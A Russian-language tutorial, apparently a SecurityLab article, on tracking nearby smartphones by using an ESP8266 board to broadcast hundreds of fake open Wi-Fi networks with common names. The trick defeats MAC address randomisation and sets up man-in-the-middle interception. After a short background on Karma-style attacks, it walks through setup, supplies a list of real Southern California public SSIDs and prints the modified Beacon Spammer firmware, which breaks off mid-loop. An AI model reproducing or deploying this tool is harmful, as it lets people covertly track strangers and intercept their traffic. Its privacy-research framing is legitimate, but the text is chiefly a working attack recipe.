  <p>Смартфоны и ноутбуки непрерывно отсылают Wi-Fi сигналы, многие из которых можно использовать для отслеживания владельцев этих устройств. <strong>В этой статье мы рассмотрим создание сотен поддельных сетей с распространенными именами с использованием дешевого IoT-устройства, запрограммированного на базе платформы Arduino.</strong> Этот трюк позволит узнать настоящий MAC адрес у находящихся неподалеку девайсов и даже перехватить канал, используемый смартфонами для передачи информации, без каких-либо подозрений.</p>
  <p>В современном мире все сложнее соблюдать конфиденциальность, когда ваш смартфон непрерывно записывает, сохраняет и передает информацию о вас. Однако многие даже не подозревают, что телефон передает незашифрованные данные через Wi-Fi практически постоянно, которые могут использоваться для отслеживания. <strong>Мы рассмотрим схему атаки, при помощи которой можно обнаруживать и отслеживать близлежащие устройства, у которых активирован Wi-Fi.</strong> Не помогут даже утилиты, внедряемые производителем для рандомизации MAC адреса.</p>
  <h2>MAC адреса и приватность смартфонов</h2>
  <p><strong>Идея, связанная с отслеживанием пользователей через Wi-Fi, включенный на смартфонах – далеко не нова.</strong> Многие крупные розничные сети начали заниматься подобного рода деятельностью несколько лет назад для отслеживания наиболее проходимых пространств магазина и продаже премиум-мест в тех местах производителям. С целью повышения конфиденциальности пользователей смартфонов на данный момент в большинстве устройств предусмотрена рандомизация MAC адреса.</p>
  <p><strong>Этот механизм подразумевает, что во время поиска Wi-Fi сетей вместо реального используется поддельный MAC адрес до тех пор, пока не будет найдена достоверная сеть</strong>. Рандомизация MAC адреса сильно улучшает приватность, но, тем не менее, не является панацеей, поскольку существуют способы обхода этой защиты.</p>
  <p><a href="https://www.youtube.com/watch?v=o95Or-Z_Ybk" target="_blank">https://www.youtube.com/watch?v=o95Or-Z_Ybk</a></p>
  <h2>Предпочитаемые сети и рандомизация</h2>
  <p>Метод, при помощи которого смартфоны и другие устройства, где включен Wi-Fi, сохраняют «открытые» и ранее использованные сети, представляет собой серьезную угрозу безопасности. Сети без паролей могут быть легко подделаны. Злоумышленник может легко спровоцировать подключение жертвы к подобным сетям, поскольку на смартфоне хранится только имя сети или SSID.</p>
  <p>Этот механизм используется для удобства. После первоначального подключения ваше устройство предполагает, что сеть достоверная, и все дальнейшие подключения происходят без подтверждения. Устройство будет подключаться даже в тех местах, где достоверная сеть не доступна. Более того, устройство без всяких уведомлений будет подключаться к любой сети, имя которой совпадает с именем достоверной сети. В этом случае высвечивается настоящий MAC адрес, и у злоумышленника появляется возможность перехватить и модифицировать ваш трафик.</p>
  <p>Мати Ванхув (Mathy Vanhoef) в своей статье, посвященной обходу рандомизации MAC адресов, описывает подобное поведение как часть процесса, во время которого создается подключение по Wi-Fi.</p>
  <p><strong>Выдержка из статьи:</strong></p>
  <blockquote>«Как только устройство обнаруживает доступную сеть и SSID совпадает с одной из сетей, к которой уже было подключение, автоматически инициируется подключение к этой точке доступа. Далее большинство девайсов, у которых реализована рандомизация MAC адреса, будут использовать настоящий MAC адрес для подключения к этой точке доступа».</blockquote>
  <h2>Прежние схемы схожих атак</h2>
  <p>Во время Karma-атаки используются имена сетей из широковещательных сообщений, отсылаемых смартфоном, для последующего создание поддельной точки доступа под одним из этих имен. <strong>Злоумышленник выжидает момент, пока близлежащее устройство отсылает пробный запрос на предмет присутствия сети, к которой уже было подключение ранее.</strong> После перехвата имени сети, запрашиваемого устройством, злоумышленник создает поддельную сеть с тем же самым именем. Далее девайс жертвы подключается к поддельной сети без каких-либо оповещений, позволяя злоумышленнику оказаться посередине и управлять информационным соединением.</p>
  <p><strong>Мати Ванхув исследовал различные методы обхода рандомизации MAC, включая создание пяти поддельных точек доступа при помощи Airbase-ng.</strong> Во время реализации этой атаки создаются сети с распространенными именами в надежде на подключение множества устройств, которые уже использовали ранее имя поддельных сетей. Как только девайс жертвы обнаружит имя сети, к которой уже было подключение, вместо случайного поддельного MAC адреса начинает использоваться настоящий. Во время своих исследования Мати обнаружил, что небольшое количество популярных поддельных SSID’ов было способно «поймать» большое количество устройств.</p>
  <p><strong>Мати описывает эту технику следующим образом:</strong></p>
  <blockquote>«Существующие методы реализации атак, где используются SSID’ы с целью получения запросов от целевых устройств, как, например, в широко известной Karma-атаке, где используются SSID’ы, содержащиеся в пробных запросах, отсылаемых жертвами. Однако в современных девайсах SSID’ы уже не рассылаются в широковещательных сообщениях, и Karma-атака больше не актуальна. Мы решаем эту проблему при помощи перечня популярных SSID’ов в надежде на то, что как минимум некоторые из этих имен устройства уже использовали при подключении».</blockquote>
  <p>Стефан (также известен как Spacehuhn) специализируется на проектах в области безопасности Wi-Fi, реализуемых с использованием макетных плат ESP8266 и ESP3. В частности, проект Beacon Spammer предназначен для создания сотен поддельных точек доступа с настраиваемыми именами. Однако поскольку имена сетей ограничены 32 символами и выравниваются посредством добавления пробелов в конце, устройства не смогли найти ни одного ранее используемого имени, и в итоге все поддельные точки доступа оказались проигнорированы.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image002.jpg" width="623" />
  </figure>
  <p><strong>Рисунок 1: Макетная плата NodeMCU ESP8266</strong></p>
  <p><strong>После беседы со Стефаном в проект Beacon Spammer были внесены изменения, после чего SSID’ы стали создаваться именно так, как указано в списке. Соответственно, теперь устройства стали опознавать поддельные сети как достоверные и принадлежащие PNL (preferred network list; предпочтительный список сетей).</strong> В модифицированной версии стало возможно использовать список распространенных имен сетей для раскрытия настоящих MACадресов у всех близлежащих девайсов.</p>
  <h2>Локальное скопление открытых SSID’ов и обратная Karma-атака</h2>
  <p>Базовая концепция атаки, связанной локальным скоплением открытых SSID’ов, заключается в создание множества доступных открытых сетей на базе списка распространенных имен, используемых на территории жертвы, при помощи сервиса <a href="https://wigle.net/" target="_blank">Wigle Wifi</a>. В итоге все близлежащие девайсы, использовавшие любое из имен сетей (или SSID) из перечня, перед повторным подключением покажут свой настоящий MAC адрес и позволят сформировать список сетей, которым доверяет устройство.</p>
  <p><strong>Полученная информация позволит злоумышленнику использовать список достоверных открытых сетей, сохраненных на телефоне, для выявления или подключения целевого устройства посредством создания поддельной точки доступа с тем же именем и огораживания жертвы от подключения к другим сетям.</strong> После того как имена сетей опознаны, злоумышленник может получить контроль над информационным подключением жертвы при помощи MITM-атаки без появления каких-либо предупреждений на устройстве.</p>
  <blockquote>«Мы предполагаем, что наиболее популярные SSID’ы представляют собой открытые хотспоты, не использующие шифрование. Таким образом, точки доступа, о которых мы сообщаем, были сконфигурированы как открытые хотспоты. Хотя airbase-ng поддерживает создание множества SSID’ов, наши эксперименты показывают, что это приложение некорректно обрабатывает большое количество SSID’ов. В итоге при реализации атаки мы ограничили количество поддельных точек доступа до 5 единиц».</blockquote>
  <p>- Мати Ванхув</p>
  <p>При помощи модифицированной версии Beacon Spammer мы смогли увеличить количество SSID’ов до нескольких сотен, тем самым увеличив шансы найти достоверные сети, которые сохранены на близлежащих устройствах. Мати продемонстрировал, что на несколько очень популярных SSID’ов реагирует большое количество девайсов. Есть вероятность, что на устройствах с сотнями популярных SSID’ов может произойти перегрузка, но в целом все работает прекрасно.</p>
  <blockquote>«SSID&#x27;ы, сконфигурированные на Wi-Fi устройствах, обычно длинные, и популярных имен, которые используются на множестве устройств, очень мало»</blockquote>
  <p>- Мати Ванхув</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image003.jpg" width="623" />
  </figure>
  <p><strong>Рисунок 2: Кумулятивное распределение процента задействованных устройств в зависимости от количества SSID’ов</strong></p>
  <p>Важно упомянуть, что подобное поведение наблюдается не только в случае целенаправленной атаки. Например, если вы прогуливаетесь мимо питейного заведения с популярным SSID’ом, которое вы уже использовали при подключении, ваше устройство будет использовать настоящий MAC адрес.</p>
  <p><strong>Обычно в этом случае происходит прекращение передачи данных до тех пор, пока вы не замечаете, что автоматически подключились в сеть. Злоумышленник, находящийся рядом с настоящей сетью с популярным SSID’ом, </strong>также может отслеживать пользователей, проходящих неподалеку без необходимости создания поддельной сети.</p>
  <h2><strong>Необходимое оборудование</strong></h2>
  <p>Для реализации схемы, описанной в этой статье, вам понадобится компьютер и устройство <a href="https://www.amazon.com/ESP8266-Internet-Development-Wireless-Micropython/dp/B07CB4P2XY" target="_blank">NodeMCU или ESP8266</a>, которое стоит около 6 долларов и может быть запрограммировано в Arduino, C++, Lua или MicroPython. Эти макетные платы стоят недорого, легко программируются и в целом удобны в работе. Вы можете купить <a href="https://www.amazon.com/Makerfocus-ESP8266-ESP-12E-Internet-Development/dp/B01IK9GEQG" target="_blank">стандартную плату</a> или заказать одну из официальных плат в магазине <a href="https://www.tindie.com/stores/spacehuhn/" target="_blank">Spacehuhn</a>.</p>
  <p><strong>В итоге получаем следующий набор:</strong></p>
  <p>· <a href="https://www.amazon.co.uk/ESP8266-Internet-Development-Wireless-Micropython/dp/B07CB4P2XY/?tag=wnbuk-21" target="_blank">ESP8266 NodeMCU Development Board Wireless Module</a>(1)</p>
  <p>· <a href="https://www.amazon.co.uk/Points-Solderless-Prototype-Breadboard-Arduino/dp/B01EFIHII4/?tag=wnbuk-21" target="_blank">Solderless 170-Point Breadboard</a>(1)</p>
  <p>· <a href="https://www.amazon.co.uk/AmazonBasics-Male-Micro-Cable-Black/dp/B0711PVX6Z/?tag=wnbuk-21" target="_blank">Кабель Micro USB</a>(1)</p>
  <p>Для отслеживания и анализа трафика будем использовать Wireshark, который работает на множестве платформ и включен в Kali Linux. Список наиболее распространенных SSID’ов, который используется для создания поддельных точек доступа, будем получать из сервиса Wigle Wifi. Чтобы улучшить результаты, нелишним будет проверить, что имена в вашем списке являются популярными.</p>
  <p><strong>Шаг 1: Настройка среды Arduino IDE</strong></p>
  <p>В этом руководстве будет использоваться свободное и кроссплатформенное приложение <a href="https://www.arduino.cc/en/Main/Software" target="_blank">Arduino IDE</a>, при помощи которого мы сможем быстро создать нужные прототипы. Эта среда разработки позволит быстро писать и загружать скрипты в устройства, поддерживающие Arduino.</p>
  <p>Arduino IDE доступна для загрузки с <a href="https://www.arduino.cc/en/Main/Software" target="_blank">официального сайта</a>. После установки зайдите в меню «Arduino» и выберите «Preferences». Далее в текстовое поле «Additional Boards Manager URLs» вставьте следующую строку:</p>
  <pre>http://arduino.esp8266.com/stable/package_esp8266com_index.json
</pre>
  <p>Затем нажмите OK для сохранения настроек.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image004.jpg" width="623" />
  </figure>
  <p><strong>Рисунок 3: Раздел с настройками приложения Arduino IDE</strong></p>
  <p><strong>Шаг 2: Настройка Arduino IDE под микроконтроллер ESP8266</strong></p>
  <p>Теперь нужно добавить NodeMCU в Менеджер плат (Boards Manager). Кликните на раздел «Tools», затем в выпадающем списке наведите мышь на раздел «Board» и появившемся перечне выберите «Boards Manager», где можно добавить дополнительные платы.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image005.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 4: Раздел меню для добавления новых плат</strong></p>
  <p>В поисковом поле появившегося окна введите «esp8266», выберите «esp8266» by «ESP8266 Community» и установите выбранный пакет.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image006.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 5: Добавление новых плат</strong></p>
  <p><strong>Теперь можно приступать к программированию NodeMCU. Подключите макетную плату, к которой уже должна быть подключена микросхема NodeMCU, к компьютеру.</strong> Если вы зайдете в раздел «Tools», то корректный порт должен быть выбран автоматически.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image007.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 6: Используемый порт</strong></p>
  <p>В разделе «Board» выберите «NodeMCU 1.0». Если порт не показывается, возможно, причина в плохом кабеле. Поэтому вначале попробуйте воспользоваться другим кабелем.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2018/76/image008.jpg" width="624" />
  </figure>
  <p><strong>Рисунок 7: Выбор нужной платы</strong></p>
  <p>Обратите внимание на две кнопки в верхней части интерфейса. Кнопка с галочкой предназначена для проверки кода на ошибки и компиляции. Кнопка со стрелкой «вправо» загружает скомпилированный код в микросхему NodeMCU.</p>
  <p><strong>Шаг 3: Загрузка проекта Beacon Spammer</strong></p>
  <p>Теперь нужно скачать проект Beacon Spammer, который является одной из нескольких жемчужин, созданных Стефаном, включая эти <a href="https://github.com/spacehuhn/esp8266_deauther/wiki/Supported-Devices" target="_blank">прекрасные платы</a>с предустановленным программным обеспечением. В некоторых случаях есть возможность подключить дополнительные антенны, и будет нелишним ознакомиться с аппаратной стороной проекта. Более подробно с проектами Стефана можно ознакомиться на <a href="https://spacehuhn.de/" target="_blank">официальном сайте</a>.</p>
  <p><strong>Для загрузки Beacon Spammer в терминале введите следующую команду:</strong></p>
  <pre>git clone https://github.com/spacehuhn/esp8266_beaconSpam.git
</pre>
  <p><strong>Шаг 4: Открытие проекта Beacon Spammer в Arduino IDE</strong></p>
  <p>Заходим в папку esp8266_beaconSpam. Внутри есть директория с тем же именем, где находится единственный файл «esp8266_beaconSpam.ino», который нужно открыть в Arduino IDE. В коде файла уже добавлено несколько SSID’ов, которые, впрочем, нам не пригодятся. Вначале нужно создать список имен сетей, на которые, как мы предполагаем, будут реагировать близлежащие устройства.</p>
  <p><strong>Шаг 5: Подготовка и сортировка списка открытых SSID’ов</strong></p>
  <p>Для реализации нашей схемы наилучшие результаты дают открытые SSID’ы (где не требуется пароль), которые наиболее распространены на нашей территории. Если у вас телефон на базе Android, то можете воспользоваться приложением <a href="https://play.google.com/store/apps/details?id=net.wigle.wigleandroid" target="_blank">Wigle Wifi</a>, прогуляться или проехаться по городу и собрать список беспроводных сетей.</p>
  <p><strong>Затем заходите в базу данных приложения Wigle Wifi, выгружаете содержимое в формат CSV и загружаете полученный файл к себе на компьютер. В Excel или Google sheets сортируем элементы списка по типу шифрования или «AuthMode».</strong></p>
  <p>Подойдут все сети с аутентификацией ESS BLE, IBSS или ESS, поскольку в этих сетях не используется пароль. Сохраняем имена сетей в текстовом файле и запускаем следующий скрипт для удаления дубликатов и сортировки списка по частоте вхождения элемента:</p>
  <pre>sort ./yourfile.txt | uniq -c | sort -n
</pre>
  <p>Если у вас есть собственный список SSID’ов, можете воспользоваться скриптом ниже, который я написал на Python, для добавления кавычек и переноса строки, чтобы ваш перечень соответствовал формату, используемому в проекте Beacon Spammer.</p>
  <p>Добавьте ваши имена сетей в файл .txt, чтобы каждый элемент был с новой строки, сохраните и запустите скрипт для форматирования. Не забудьте поменять в скрипте имя и местонахождения входного файла (inputfile.txt), где должны находиться имена сетей, а также, если необходимо, укажите имя выходного файла с отформатированным списком.</p>
  <pre>append = &quot;\\n\&quot;&quot;
prepend = &quot;\&quot;&quot;
with open(&#x27;./inputfile.txt&#x27;, &#x27;r&#x27;) as istr:
    with open(&#x27;./outputfile.txt&#x27;, &#x27;w&#x27;) as ostr:
        for line in istr:
            line = (prepend + line.rstrip(&#x27;\n&#x27;) + append)
            print(line, file=ostr)
</pre>
  <p>Полученный список добавьте в то место скрипта, где происходит создание сетей. Ниже показан пример моего перечня, который я собрал в Южной Калифорнии:</p>
  <pre>&quot;JWMarriott_GUEST\n&quot;
  &quot;JWMarriott_LOBBY\n&quot;
  &quot;LATTC-Visitor\n&quot;
  &quot;LATimes-Guest\n&quot;
  &quot;LAUSD-Guest\n&quot;
  &quot;LAX-C guest\n&quot;
  &quot;McDonalds Free WiFi\n&quot;
  &quot;Oh Ranger! Wi-Fi\n&quot;
  &quot;Public Health Guest\n&quot;
  &quot;SETUP\n&quot;
  &quot;Starbucks WiFi\n&quot;
  &quot;TWCWiFi\n&quot;
  &quot;TWGuest\n&quot;
  &quot;USC Guest Wireless\n&quot;
  &quot;WHOPPERWIFI\n&quot;
  &quot;WLAN-GUEST\n&quot;
  &quot;attwifi\n&quot;
  &quot;belkin.8fa.guests\n&quot;
  &quot;dwcwifi\n&quot;
  &quot;guest\n&quot;
  &quot;hpsetup\n&quot;
  &quot;lacemployee\n&quot;
  &quot;lacguest\n&quot;
  &quot;lascguest\n&quot;
  &quot;linksys\n&quot;
  &quot;ubnt\n&quot;
  &quot;wirelesslan\n&quot;
  &quot;A_Guest\n&quot;
  &quot;Ace Hotel\n&quot;
  &quot;CableWiFi\n&quot;
  &quot;CityofLosAngelesGuest\n&quot;
  &quot;DHS_Guest\n&quot;
  &quot;Guest\n&quot;
  &quot;Americas Best Value Inn\n&quot;
  &quot;Amoeba - Guest\n&quot;
  &quot;Budget Inn\n&quot;
  &quot;CableWiFi\n&quot;
  &quot;Camden\n&quot;
  &quot;CenterWiFi\n&quot;
  &quot;CoffeeBeanWifi\n&quot;
  &quot;Comfort Inn\n&quot;
  &quot;Cricket-Guest\n&quot;
  &quot;DaysInnOnline\n&quot;
  &quot;Dennys_Guest_WIFI\n&quot;
  &quot;FBI-SurveillanceVan\n&quot;
  &quot;Google Starbucks\n&quot;
  &quot;Guest\n&quot;
  &quot;Guest T-Mobile\n&quot;
  &quot;Guestnet\n&quot;
  &quot;Hazelitas-guest\n&quot;
  &quot;Hollywood Guest Inn\n&quot;
  &quot;Hollywood Palms Inn &amp; Suites\n&quot;
  &quot;Jacks_Guest\n&quot;
  &quot;LAFILM Guest\n&quot;
  &quot;LAUSD-Guest\n&quot;
  &quot;McDonalds Free WiFi\n&quot;
  &quot;Moment Hotel\n&quot;
  &quot;Netflix\n&quot;
  &quot;PATH Wifi\n&quot;
  &quot;Paulist-guest\n&quot;
  &quot;Philz Coffee\n&quot;
  &quot;Rodeway Inn\n&quot;
  &quot;Roosevelt\n&quot;
  &quot;Saharan Motor Hotel\n&quot;
  &quot;Sandhouse Wi-Fi\n&quot;
  &quot;Staff\n&quot;
  &quot;Starbucks WiFi\n&quot;
  &quot;Stella Barra Guest\n&quot;
  &quot;Students\n&quot;
  &quot;Sunset 8 Motel\n&quot;
  &quot;THEMELT\n&quot;
  &quot;TWCWiFi\n&quot;
  &quot;Tender Greens\n&quot;
  &quot;URBAN_GUEST_WIFI\n&quot;
  &quot;WK-Guest\n&quot;
  &quot;WL-GUEST\n&quot;
  &quot;Wendys_Guest\n&quot;
  &quot;WhopperWifi\n&quot;
  &quot;WlanVPN\n&quot;
  &quot;admin-guest\n&quot;
  &quot;att-wifi\n&quot;
  &quot;ihop-5G-Guest\n&quot;
 &quot;ihop-Guest\n&quot;
</pre>
  <p><strong>Шаг 6: Модификация скрипта и загрузка кода в NodeMCU</strong></p>
  <p>Теперь нужно изменить стандартные настройки проекта, которые находятся в начале загруженного ранее файла.</p>
  <pre>/ ===== Settings ===== //
const uint8_t channels[] = {1, 6, 11}; // used Wi-Fi channels (available: 1-14)
const bool wpa2 = false; // WPA2 networks
const bool appendSpaces = true; // makes all SSIDs 32 characters long to improve performance
</pre>
  <p>Чтобы отслеживать ответы, поступающие поддельным сетям, нужно уменьшить количество каналов до одного. Если использовать несколько каналов, вы не сможете отслеживать устройства, которые будут реагировать на поддельные сети. Вы можете выбрать любой канал, однако некоторых исследованиях рекомендуется выбирать четвертый.</p>
  <p><strong>Строку «wpa2 = false» нужно оставить без изменений. Таким образом, устройства будут видеть поддельные сети, у которых отсутствует пароль.</strong></p>
  <p>Последняя опция позволяет отключить выравнивание имен сетей, и нужно установить значение false. В противном случае в конце имени будут добавляться пробелы, чтобы все имена были длинной 32 символа, и близлежащие устройства не смогут опознать эти SSID’ы.</p>
  <p>Осталось добавить имена сетей, которые мы хотим создать, в нужном формате. Чтобы имена были заключены в двойные кавычки, и в конце стоял символ переноса строки. Теперь модифицированный код выглядит так:</p>
  <pre>/*
  ===========================================
       Copyright (c) 2018 Stefan Kremser
              github.com/spacehuhn
  ===========================================
*/
 
// ===== Settings ===== //
const uint8_t channels[] = {1}; // used Wi-Fi channels (available: 1-14)
const bool wpa2 = false; // WPA2 networks
const bool appendSpaces = false; // makes all SSIDs 32 characters long to improve performance
 
/*
  SSIDs:
  - don&#x27;t forget the \n at the end of each SSID!
  - max. 32 characters per SSID
  - don&#x27;t add duplicates! You have to change one character at least
*/
const char ssids[] PROGMEM = {
  &quot;JWMarriott_GUEST\n&quot;
  &quot;JWMarriott_LOBBY\n&quot;
  &quot;LATTC-Visitor\n&quot;
  &quot;LATimes-Guest\n&quot;
  &quot;LAUSD-Guest\n&quot;
  &quot;LAX-C guest\n&quot;
  &quot;McDonalds Free WiFi\n&quot;
  &quot;Oh Ranger! Wi-Fi\n&quot;
  &quot;Public Health Guest\n&quot;
  &quot;SETUP\n&quot;
  &quot;Starbucks WiFi\n&quot;
  &quot;TWCWiFi\n&quot;
  &quot;TWGuest\n&quot;
  &quot;USC Guest Wireless\n&quot;
  &quot;WHOPPERWIFI\n&quot;
  &quot;WLAN-GUEST\n&quot;
  &quot;attwifi\n&quot;
  &quot;belkin.8fa.guests\n&quot;
  &quot;dwcwifi\n&quot;
  &quot;guest\n&quot;
  &quot;hpsetup\n&quot;
  &quot;lacemployee\n&quot;
  &quot;lacguest\n&quot;
  &quot;lascguest\n&quot;
  &quot;linksys\n&quot;
  &quot;ubnt\n&quot;
  &quot;wirelesslan\n&quot;
  &quot;A_Guest\n&quot;
  &quot;Ace Hotel\n&quot;
  &quot;CableWiFi\n&quot;
  &quot;CityofLosAngelesGuest\n&quot;
  &quot;DHS_Guest\n&quot;
  &quot;Guest\n&quot;
  &quot;Americas Best Value Inn\n&quot;
  &quot;Amoeba - Guest\n&quot;
  &quot;Budget Inn\n&quot;
  &quot;CableWiFi\n&quot;
  &quot;Camden\n&quot;
  &quot;CenterWiFi\n&quot;
  &quot;CoffeeBeanWifi\n&quot;
  &quot;Comfort Inn\n&quot;
  &quot;Cricket-Guest\n&quot;
  &quot;DaysInnOnline\n&quot;
  &quot;Dennys_Guest_WIFI\n&quot;
  &quot;FBI-SurveillanceVan\n&quot;
  &quot;Google Starbucks\n&quot;
  &quot;Guest\n&quot;
  &quot;Guest T-Mobile\n&quot;
  &quot;Guestnet\n&quot;
  &quot;Hazelitas-guest\n&quot;
  &quot;Hollywood Guest Inn\n&quot;
  &quot;Hollywood Palms Inn &amp; Suites\n&quot;
  &quot;Jacks_Guest\n&quot;
  &quot;LAFILM Guest\n&quot;
  &quot;LAUSD-Guest\n&quot;
  &quot;McDonalds Free WiFi\n&quot;
  &quot;Moment Hotel\n&quot;
  &quot;Netflix\n&quot;
  &quot;PATH Wifi\n&quot;
  &quot;Paulist-guest\n&quot;
  &quot;Philz Coffee\n&quot;
  &quot;Rodeway Inn\n&quot;
  &quot;Roosevelt\n&quot;
  &quot;Saharan Motor Hotel\n&quot;
  &quot;Sandhouse Wi-Fi\n&quot;
  &quot;Staff\n&quot;
  &quot;Starbucks WiFi\n&quot;
  &quot;Stella Barra Guest\n&quot;
  &quot;Students\n&quot;
  &quot;Sunset 8 Motel\n&quot;
  &quot;THEMELT\n&quot;
  &quot;TWCWiFi\n&quot;
  &quot;Tender Greens\n&quot;
  &quot;URBAN_GUEST_WIFI\n&quot;
  &quot;WK-Guest\n&quot;
  &quot;WL-GUEST\n&quot;
  &quot;Wendys_Guest\n&quot;
  &quot;WhopperWifi\n&quot;
  &quot;WlanVPN\n&quot;
  &quot;admin-guest\n&quot;
  &quot;att-wifi\n&quot;
  &quot;ihop-5G-Guest\n&quot;
  &quot;ihop-Guest\n&quot;
};
// ==================== //
 
// ===== Includes ===== //
#include &lt;ESP8266WiFi.h&gt;
 
extern &quot;C&quot; {
#include &quot;user_interface.h&quot;
  typedef void (*freedom_outside_cb_t)(uint8 status);
  int wifi_register_send_pkt_freedom_cb(freedom_outside_cb_t cb);
  void wifi_unregister_send_pkt_freedom_cb(void);
  int wifi_send_pkt_freedom(uint8 *buf, int len, bool sys_seq);
}
// ==================== //
 
// run-time variables
char emptySSID[32];
uint8_t channelIndex = 0;
uint8_t macAddr[6];
uint8_t wifi_channel = 1;
uint32_t currentTime = 0;
uint32_t packetSize = 0;
uint32_t packetCounter = 0;
uint32_t attackTime = 0;
uint32_t packetRateTime = 0;
 
// beacon frame definition
uint8_t beaconPacket[109] = {
  /*  0 - 3  */ 0x80, 0x00, 0x00, 0x00, // Type/Subtype: managment beacon frame
  /*  4 - 9  */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
  /* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
  /* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
 
  // Fixed parameters
  /* 22 - 23 */ 0x00, 0x00, // Fragment &amp; sequence number (will be done by the SDK)
  /* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
  /* 32 - 33 */ 0xe8, 0x03, // Interval: 0x64, 0x00 =&gt; every 100ms - 0xe8, 0x03 =&gt; every 1s
  /* 34 - 35 */ 0x31, 0x00, // capabilities Tnformation
 
  // Tagged parameters
 
  // SSID parameters
  /* 36 - 37 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
  /* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x20, // SSID
 
  // Supported Rates
  /* 70 - 71 */ 0x01, 0x08, // Tag: Supported Rates, Tag length: 8
  /* 72 */ 0x82, // 1(B)
  /* 73 */ 0x84, // 2(B)
  /* 74 */ 0x8b, // 5.5(B)
  /* 75 */ 0x96, // 11(B)
  /* 76 */ 0x24, // 18
  /* 77 */ 0x30, // 24
  /* 78 */ 0x48, // 36
  /* 79 */ 0x6c, // 54
 
  // Current Channel
  /* 80 - 81 */ 0x03, 0x01, // Channel set, length
  /* 82 */      0x01,       // Current Channel
 
  // RSN information
  /*  83 -  84 */ 0x30, 0x18,
  /*  85 -  86 */ 0x01, 0x00,
  /*  87 -  90 */ 0x00, 0x0f, 0xac, 0x02,
  /*  91 -  92 */ 0x02, 0x00,
  /*  93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
  /* 101 - 102 */ 0x01, 0x00,
  /* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
  /* 107 - 108 */ 0x00, 0x00
};
 
// goes to next channel
void nextChannel() {
  if(sizeof(channels) &gt; 1){
    uint8_t ch = channels[channelIndex];
    channelIndex++;
    if (channelIndex &gt; sizeof(channels)) channelIndex = 0;
 
    if (ch != wifi_channel &amp;&amp; ch &gt;= 1 &amp;&amp; ch &lt;= 14) {
      wifi_channel = ch;
      wifi_set_channel(wifi_channel);
    }
  }
}
 
// generates random MAC
void randomMac() {
  for (int i = 0; i &lt; 6; i++)
    macAddr[i] = random(256);
}
 
void setup() {
  // create empty SSID
  for (int i = 0; i &lt; 32; i++)
    emptySSID[i] = &#x27; &#x27;;
 
  // for random generator
  randomSeed(os_random());
 
  // set packetSize
  packetSize = sizeof(beaconPacket);
  if (wpa2) {
    beaconPacket[34] = 0x31;
  } else {
    beaconPacket[34] = 0x21;
    packetSize -= 26;
  }
 
  // generate random mac address
  randomMac();
 
  // start serial
  Serial.begin(115200);
  Serial.println();
 
  // get time
  currentTime = millis();
 
  // start WiFi
  WiFi.mode(WIFI_OFF);
  wifi_set_opmode(STATION_MODE);
 
  // set channel
  wifi_set_channel(channels[0]);
 
  // print out saved SSIDs
  Serial.println(&quot;SSIDs:&quot;);
  int i = 0;
  int len = sizeof(ssids);
  while(i &lt; len){
    Serial.print((char)pgm_read_byte(ssids + i));
    i++;
  }
 
  Serial.println();
  Serial.println(&quot;Started \\o/&quot;);
  Serial.println();
}
 
void loop() {
  currentTime = millis();
 
  // send out SSIDs
  if (currentTime - attackTime &gt; 100) {
    attackTime = currentTime;
 
    // temp variables
    int i = 0;
    int j = 0;
    int ssidNum = 1;
    char tmp;
    int ssidsLen = strlen_P(ssids);
    bool sent = false;
 
    // go to next channel
    nextChannel();
 
    while (i &lt; ssidsLen) {
      // read out next SSID
      j = 0;
      do {
        tmp = pgm_read_byte(ssids + i + j);
        j++;
      } while (tmp != &#x27;\n&#x27; &amp;&amp; j &lt;= 32 &amp;&amp; i + j &lt; ssidsLen);
 
      uint8_t ssidLen = j - 1;
 
      // set MAC address
      macAddr[5] = ssidNum;
      ssidNum++;
 
      // write MAC address into beacon frame
      memcpy(&amp;beaconPacket[10], macAddr, 6);
      memcpy(&amp;beaconPacket[16], macAddr, 6);
 
      // reset SSID
      memcpy(&amp;beaconPacket[38], emptySSID, 32);
 
      // write new SSID into beacon frame
      memcpy_P(&amp;beaconPacket[38], &amp;ssids[i], ssidLen);
 
      // set channel for beacon frame
      beaconPacket[82] = wifi_channel;
 
      // send packet
      if(appendSpaces){
        for(int k=0;k&lt;3;k++){
          packetCounter += wifi_send_pkt_freedom(beaconPacket, packetSize, 0) == 0;
          delay(1);
        }
      }
 
      // remove spaces
      else {
 
        uint16_t tmpPacketSize = (packetSize - 32) + ssidLen; // calc size
        uint8_t* tmpPacket = new uint8_t[tmpPacketSize]; // create packet buffer
        memcpy(&amp;tmpPacket[0], &amp;beaconPacket[0], 38 + ssidLen); // copy first half of packet into buffer
        tmpPacket[37] = ssidLen; // update SSID length byte
        memcpy(&amp;tmpPacket[38 + ssidLen], &amp;beaconPacket[70], wpa2 ? 39 : 13); // copy second half of packet into buffer
 
        // send packet
        for(int k=0;k&lt;3;k++){
          packetCounter += wifi_send_pkt_freedom(tmpPacket, tmpPacketSize, 0) == 0;
          delay(1);
